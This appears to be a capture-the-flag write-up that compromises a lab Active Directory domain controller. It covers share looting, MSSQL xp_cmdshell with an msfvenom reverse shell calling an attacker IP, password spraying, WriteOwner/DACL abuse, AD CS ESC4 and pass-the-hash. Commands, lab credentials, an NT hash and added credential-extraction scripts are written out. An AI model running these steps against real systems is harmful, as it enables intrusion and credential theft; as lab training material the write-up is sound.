
Provided Credentials#
As is common in real-world Windows penetration tests, the engagement started with valid domain credentials:
| Username | Password |
|---|---|
| rose | KxEPkKe6R8su |
Enumeration#
Nmap#
An initial TCP scan was performed using Nmap to identify exposed services on the target host.
sudo nmap -sVC 10.129.232.128 -oA nmap/10.129.232.128-tcp
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-21 14:37 CET
Nmap scan report for 10.129.232.128
Host is up (0.056s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
|_ssl-date: 2026-02-21T13:38:39+00:00; 0s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-02-21T13:38:39+00:00; 0s from scanner time.
| ms-sql-info:
| 10.129.2.1:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.2.1:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-02-21T13:36:02
|_Not valid after: 2056-02-21T13:36:02
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
|_ssl-date: 2026-02-21T13:38:39+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
|_ssl-date: 2026-02-21T13:38:39+00:00; 0s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-02-21T13:38:03
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.86 seconds
The scan identified the target as a Windows Domain Controller: DNS (53), LDAP over TLS (636), SMB (445) and the Global Catalog ports (3268/3269) are all exposed, and the LDAP banners name the Active Directory domain sequel.htb. The LDAP certificates list DC01.sequel.htb as a Subject Alternative Name, and the NTLM challenge returned by the MSSQL service confirms the host name DC01 and reveals the OS build 10.0.17763 (Windows Server 2019). Two details matter for later steps: SMB signing is enabled and required, so NTLM relay to SMB on this host is not an option, and SQL Server 2019 is exposed on 1433 with no post-RTM patches reported.
To ensure proper name resolution during subsequent interactions, the host was added to /etc/hosts:
10.129.232.128 sequel.htb DC01.sequel.htb DC01
SMB Shares#
SMB shares were enumerated using the provided credentials.
nxc smb sequel.htb -u "rose" -p "KxEPkKe6R8su" --shares
A share named Accounting Department was found to be readable. Access was obtained using:
smbclient //sequel.htb/Accounting\ Department -U "rose%KxEPkKe6R8su"
Two Microsoft Excel files were identified and downloaded for offline analysis. Initially, the files appeared corrupted. However, Microsoft Excel’s Open and Repair functionality was used to recover their contents.

The file accounts.xlsx contained clear text credentials for four users.
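Open and Repair is not the only way to get at a damaged workbook. An .xlsx file is a ZIP archive of XML parts: string cells live in xl/sharedStrings.xml and each worksheet references them by index, so the data can be read directly even when Excel refuses the file because a part such as [Content_Types].xml is missing or mangled. The following example is added here and is not the author's code; the workbook it reads is constructed in memory with made-up accounts (the real accounts.xlsx is not reproduced on this page), so it runs offline.

```python
"""Recover credentials from a damaged .xlsx without Excel's Open and Repair.

Handles the three ways a cell's text can be stored: shared-string index
(t="s"), inline string (t="inlineStr") and raw value (numbers, dates), and
keeps columns aligned when a row has empty cells.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"

# Constructed sample parts with made-up users and passwords (not the box's data).
SHARED_STRINGS = f"""<sst xmlns="{NS[1:-1]}" count="7" uniqueCount="7">
<si><t>Username</t></si><si><t>Password</t></si>
<si><t>angela</t></si><si><t>Winter2024!</t></si>
<si><r><rPr><b/></rPr><t>oscar</t></r></si>
<si><t>kevin</t></si><si><t>Summer2024!</t></si>
</sst>"""

SHEET1 = f"""<worksheet xmlns="{NS[1:-1]}"><sheetData>
<row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c></row>
<row r="2"><c r="A2" t="s"><v>2</v></c><c r="B2" t="s"><v>3</v></c></row>
<row r="3"><c r="A3" t="s"><v>4</v></c><c r="B3" t="inlineStr"><is><t>Spring2024!</t></is></c></row>
<row r="4"><c r="A4" t="s"><v>5</v></c><c r="B4"><v>20241001</v></c></row>
<row r="5"><c r="B5" t="s"><v>6</v></c></row>
</sheetData></worksheet>"""


def build_damaged_workbook() -> bytes:
    """Constructed sample: a workbook with no [Content_Types].xml or _rels parts,
    which is enough for Excel to declare it corrupt while the data is intact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", SHARED_STRINGS)
        zf.writestr("xl/worksheets/sheet1.xml", SHEET1)
    return buf.getvalue()


def shared_strings(zf: zipfile.ZipFile) -> list[str]:
    """Shared-string table in index order; rich-text runs (<r><t>) are joined."""
    root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(f"{NS}t")) for si in root.iter(f"{NS}si")]


def col_index(ref: str) -> int:
    """'A1' -> 0, 'B7' -> 1, 'AA3' -> 26; keeps columns aligned across sparse rows."""
    n = 0
    for ch in re.match(r"[A-Z]+", ref).group(0):
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n - 1


def cell_text(c: ET.Element, sst: list[str]) -> str:
    t = c.get("t")
    v = c.find(f"{NS}v")
    if t == "s":                      # index into the shared-string table
        return sst[int(v.text)]
    if t == "inlineStr":              # string stored inside the cell
        return "".join(x.text or "" for x in c.iter(f"{NS}t"))
    return v.text if v is not None else ""  # numbers, booleans, dates: raw value


def sheet_rows(xlsx_bytes: bytes, sheet: str = "xl/worksheets/sheet1.xml") -> list[list[str]]:
    """Rows as lists of cell text, padded so every row has the same width."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        sst = shared_strings(zf)
        root = ET.fromstring(zf.read(sheet))
    rows = [{col_index(c.get("r")): cell_text(c, sst) for c in row.findall(f"{NS}c")}
            for row in root.iter(f"{NS}row")]
    width = max((max(r) + 1 for r in rows if r), default=0)
    return [[r.get(i, "") for i in range(width)] for r in rows]


def credentials(rows: list[list[str]]) -> dict[str, str]:
    """Map username -> password using the header row; rows lacking either are skipped."""
    header = [h.strip().lower() for h in rows[0]]
    u, p = header.index("username"), header.index("password")
    return {r[u]: r[p] for r in rows[1:] if r[u] and r[p]}


if __name__ == "__main__":
    for user, pw in credentials(sheet_rows(build_damaged_workbook())).items():
        print(f"{user}:{pw}")
```

Against a real file, replace build_damaged_workbook() with the downloaded bytes; if the worksheet part itself is truncated, a regex over the raw bytes for <t>...</t> will still pull the shared strings, at the cost of losing the row structure.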

The recovered credentials were sprayed against the exposed services. The sa login was valid on the MSSQL service (it is a local SQL login, hence --local-auth):
nxc mssql sequel.htb -u "sa" -p "<password>" --local-auth
Access was obtained with Impacket's mssqlclient, which uses SQL authentication unless -windows-auth is given and prompts for the password:
impacket-mssqlclient sa@sequel.htb
After authentication, xp_cmdshell was enabled. It is off by default and counts as an advanced option, so show advanced options has to be turned on first:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- test
EXEC xp_cmdshell 'net user';
Since xp_cmdshell was disabled again shortly after each use, the enable and the command were issued together as one batch:
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'net user';
Foothold#
To obtain a reverse shell, a payload was generated using Msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.219 LPORT=4444 -f exe > anx.exe
The payload was then uploaded to the server:
nxc mssql sequel.htb -u "sa" -p "<password>" --local-auth --put-file anx.exe "C:\Users\sql_svc\Documents\anx.exe"
File upload was verified:
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'dir C:\Users\sql_svc\Documents';
A listener was started on the attacking machine:
rlwrap nc -lvnp 4444
The payload was executed via SQL:
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'C:\Users\sql_svc\Documents\anx.exe';
A reverse shell was successfully received as sql_svc.

Credentials for domain sql_svc#
The SQL Server installation directory was examined, and the clear-text password of the domain service account sql_svc was found in C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI, an unattended-setup configuration file for SQL Server.
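SQL Server setup reads its answers from an INI file with a single [OPTIONS] section; Microsoft's documented unattended-install parameters include SQLSVCACCOUNT and SQLSVCPASSWORD for the engine service account and SAPWD for the sa login. The page does not show the contents of sql-Configuration.INI, so the sample below is constructed with made-up values. This example is added here and is not the author's code; it pulls every account/password pair out of such a file, which is the loot that feeds the spray in the next step.

```python
"""Extract credentials from a SQL Server unattended-setup INI ([OPTIONS] section).

Values are quoted in these files, and a password may legitimately contain ';'
or '#', so the parser strips the quotes but never treats those characters as
inline comments. Key names are kept in their original case.
"""
import configparser
import re

# Constructed sample, not the file from the target; passwords are made up.
SAMPLE_INI = r"""
;SQL Server 2019 Configuration File (constructed sample)
[OPTIONS]
ACTION="Install"
FEATURES=SQLENGINE
INSTANCENAME="SQLEXPRESS"
SECURITYMODE="SQL"
SAPWD="Sa!Example;2019"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="Svc;Example#2019"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
"""


def parse_options(ini_text: str) -> dict[str, str]:
    """Return the [OPTIONS] keys with surrounding double quotes removed."""
    # interpolation=None: a '%' in a password must not be treated as a template.
    # inline_comment_prefixes=None (the default, stated explicitly): only whole-line
    # ';' or '#' comments are dropped, so 'Svc;Example#2019' survives intact.
    cp = configparser.ConfigParser(interpolation=None, inline_comment_prefixes=None)
    cp.optionxform = str  # keep SQLSVCPASSWORD rather than sqlsvcpassword
    cp.read_string(ini_text)
    return {k: v.strip().strip('"') for k, v in cp["OPTIONS"].items()}


def secrets(options: dict[str, str]) -> list[tuple[str, str]]:
    """Pair each <PREFIX>PASSWORD key with its <PREFIX>ACCOUNT key; SAPWD belongs to sa.

    This generalises beyond the engine service: AGTSVCPASSWORD, ASSVCPASSWORD and
    the other service parameters follow the same naming pattern.
    """
    found = []
    for key, value in options.items():
        if not value:
            continue
        if key == "SAPWD":
            found.append(("sa", value))
        elif m := re.fullmatch(r"(\w+)PASSWORD", key):
            account = options.get(m.group(1) + "ACCOUNT", "<unknown>")
            found.append((account, value))
    return found


if __name__ == "__main__":
    for account, password in secrets(parse_options(SAMPLE_INI)):
        print(f"{account}:{password}")
```

Run it against the real file (read the INI into ini_text instead of SAMPLE_INI); the account column tells you whether a hit is a SQL login (sa) or a domain account worth spraying across SMB and WinRM.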

Privilege Escalation#
From sql_svc to ryan#
A list of domain usernames was compiled (the earlier net user output on the DC is one source, since on a domain controller it enumerates domain accounts) and the sql_svc password was sprayed across it to find credential reuse. --continue-on-success keeps nxc from stopping at the first valid login:
nxc smb sequel.htb -u Enumeration/users.txt -p "<password>" --continue-on-success
The user ryan reused the same password and was permitted to log in over WinRM:
evil-winrm -u 'ryan' -p '<password>' -i sequel.htb
From ryan to ca_svc#
The domain was collected with nxc's BloodHound ingestor and loaded into BloodHound to look for privilege escalation paths:
nxc ldap sequel.htb -d sequel.htb -u 'ryan' -p '<password>' --bloodhound --dns-server 10.129.232.128 -c All
User ryan held WriteOwner over the user account ca_svc, which was a member of the Cert Publishers group. WriteOwner on its own grants no access to the object, but it lets the holder take ownership, and an owner can always rewrite the object's DACL; the chain is therefore: take ownership, grant yourself full control, then use full control for a targeted Kerberoast, shadow credentials or a password reset. The article that was followed describes the primitive as:
“Attackers can exploit the WriteOwner permission when they gain control of an object that has this privilege over another directory object. This allows them to grant ownership, then assign full control, and ultimately perform attacks like Kerberoasting or a password change without knowing the victim’s current credentials.”
In this scenario a password change was performed with the Impacket toolkit. First, owneredit was used to make ryan the owner of the ca_svc object:
impacket-owneredit -action write -new-owner 'ryan' -target-dn 'CN=CERTIFICATION AUTHORITY,CN=Users,DC=sequel,DC=htb' 'sequel.htb'/'ryan':'<password>' -dc-ip 10.129.232.128
With ryan as owner, dacledit was run to add a FullControl ACE for ryan to the object's DACL (the owner of an object can write its DACL regardless of the ACEs already present):
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target-dn 'CN=CERTIFICATION AUTHORITY,CN=Users,DC=sequel,DC=htb' 'sequel.htb'/'ryan':'<password>' -dc-ip 10.129.232.128
The password of ca_svc was then reset with bloodyAD. On a real engagement this is the noisiest option (event 4724 on the DC, and anything using the account stops authenticating); with full control over the object, shadow credentials (msDS-KeyCredentialLink) or a targeted Kerberoast achieve the same takeover without changing the password.
bloodyAD --host "10.129.232.128" -d "sequel.htb" -u "ryan" -p "<password>" set password "ca_svc" "Password@987"
From ca_svc to Administrator (AD CS)#
AD CS Enumeration#
After control of the CA service account was obtained, certificate templates were enumerated using Certipy to identify potential misconfigurations.
certipy-ad find -u ca_svc@sequel.htb -p "Password@987" -dc-ip "10.129.232.128" -vulnerable
The -vulnerable flag filters the report to templates and CA settings that match known Active Directory Certificate Services (AD CS) abuse techniques; add -stdout to print the report instead of only writing the output files.


The results showed that the ca_svc account had excessive permissions over the DunderMifflinAuthentication certificate template. These permissions enabled exploitation via an ESC4 attack.
Exploiting AD CS#
A published AD CS abuse reference was used as guidance; the path that applied here was ESC4.
ESC4 means the attacker can rewrite the template itself, so the template is first made vulnerable (Certipy's default configuration lets the enrollee supply the subject and enables authentication EKUs without approval) and then abused like ESC1. Certipy saves the current template configuration to DunderMifflinAuthentication.json before overwriting it, which is what makes the cleanup step at the end possible:
certipy-ad template -u ca_svc@sequel.htb -p "Password@987" -dc-ip "10.129.232.128" -template "DunderMifflinAuthentication" -write-default-configuration
Next, a certificate was requested using the modified template. A custom Subject Alternative Name (SAN) was specified to impersonate the domain administrator account.
certipy-ad req -u ca_svc@sequel.htb -p "Password@987" -dc-ip "10.129.232.128" -target "dc01.sequel.htb" -ca "sequel-DC01-CA" -template "DunderMifflinAuthentication" -upn "administrator@sequel.htb"
Certipy then authenticated with the issued certificate over PKINIT, obtained a TGT for Administrator and recovered the account's NT hash (it reads the hash from the PAC via Kerberos U2U):
certipy-ad auth -pfx administrator.pfx -username Administrator -domain sequel.htb -dc-ip 10.129.232.128
After successful exploitation, the original template configuration was restored to its previous state.
certipy-ad template -u ca_svc@sequel.htb -p "Password@987" -dc-ip "10.129.232.128" -template "DunderMifflinAuthentication" -write-configuration "DunderMifflinAuthentication.json" -no-save
Finally, the server was accessed via WinRM using Pass-the-Hash with the Administrator NT hash:
evil-winrm -u 'Administrator' -H 7a8d4e04986afa8ed4060f75e5a0b3ff -i sequel.htb
